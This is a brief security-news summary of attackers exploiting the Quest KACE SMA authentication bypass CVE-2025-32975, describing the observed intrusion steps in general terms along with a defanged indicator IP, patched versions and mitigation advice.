Threat actors have been observed exploiting CVE-2025-32975 in unpatched Quest KACE Systems Management Appliance (SMA) instances, enabling authentication bypass and administrative takeover. Arctic Wolf detected activity from the week of March 9, 2026, including dropping Base64 payloads from 216.126.225[.]156, account creation via runkbot.exe, credential theft with Mimikatz, and RDP access to backup systems; administrators should apply patches and avoid exposing SMA to the internet. #CVE-2025-32975 #QuestKACE #SMA #ArcticWolf #Mimikatz #Veeam #Veritas #runkbot.exe
Keypoints
- A CVSS 10.0 authentication bypass (CVE-2025-32975) in Quest KACE SMA is being exploited to impersonate users and seize administrative accounts.
- Arctic Wolf observed malicious activity starting the week of March 9, 2026, targeting internet-exposed, unpatched SMA systems.
- Attackers used curl to download Base64-encoded payloads from 216.126.225[.]156 and leveraged runkbot.exe to create additional administrative accounts.
- Adversaries conducted credential harvesting with Mimikatz, performed reconnaissance commands, and obtained RDP access to backup infrastructure and domain controllers.
- Administrators are advised to apply patches (13.0.385, 13.1.81, 13.2.183, 14.0.341 Patch 5, 14.1.101 Patch 4) and avoid exposing SMA instances to the internet.
Read More: https://thehackernews.com/2026/03/hackers-exploit-cve-2025-32975-cvss-100.html